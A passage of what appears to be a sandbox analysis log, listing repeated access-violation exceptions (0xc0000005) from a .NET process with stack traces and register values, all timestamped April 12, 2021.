registers.ebp: 95286252 registers.edx: 195 registers.ebx: 34938888 registers.esi: 35520320 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab5568 0xab3c75 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645808 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645848 registers.edx: 195 registers.ebx: 34939004 registers.esi: 35548512 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab501c 0xab4c61 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 95286212 registers.edi: 34819012 registers.eax: 0 registers.ebp: 95286252 registers.edx: 195 registers.ebx: 34938888 registers.esi: 35588156 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab507d 0xab5588 0xab3c75 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645804 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645844 registers.edx: 195 registers.ebx: 34955916 registers.esi: 35624436 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab5593 0xab3c75 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645808 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645848 registers.edx: 195 registers.ebx: 34939004 registers.esi: 35684060 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34938888 registers.esi: 35891128 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab603c 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 136178912 registers.edi: 34819012 registers.eax: 0 registers.ebp: 136178952 registers.edx: 195 registers.ebx: 34818888 registers.esi: 36903060 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3dee mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34939004 registers.esi: 37039068 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab507d 0xab63fc 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 136178868 registers.edi: 34819012 registers.eax: 0 registers.ebp: 136178908 registers.edx: 195 registers.ebx: 53868408 registers.esi: 37283624 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab6404 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 136178872 registers.edi: 34819012 registers.eax: 0 registers.ebp: 136178912 registers.edx: 195 registers.ebx: 37277208 registers.esi: 37326788 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34938888 registers.esi: 37336484 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab6855 0xab6425 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 136178852 registers.edi: 34819012 registers.eax: 0 registers.ebp: 136178892 registers.edx: 195 registers.ebx: 37529440 registers.esi: 37537440 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab6aae 0xab6868 0xab6425 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 136178820 registers.edi: 34819012 registers.eax: 0 registers.ebp: 136178860 registers.edx: 195 registers.ebx: 37529440 registers.esi: 37697180 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3dee mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34939004 registers.esi: 37702620 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab603c 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 143912672 registers.edi: 34819012 registers.eax: 0 registers.ebp: 143912712 registers.edx: 195 registers.ebx: 34818888 registers.esi: 37714204 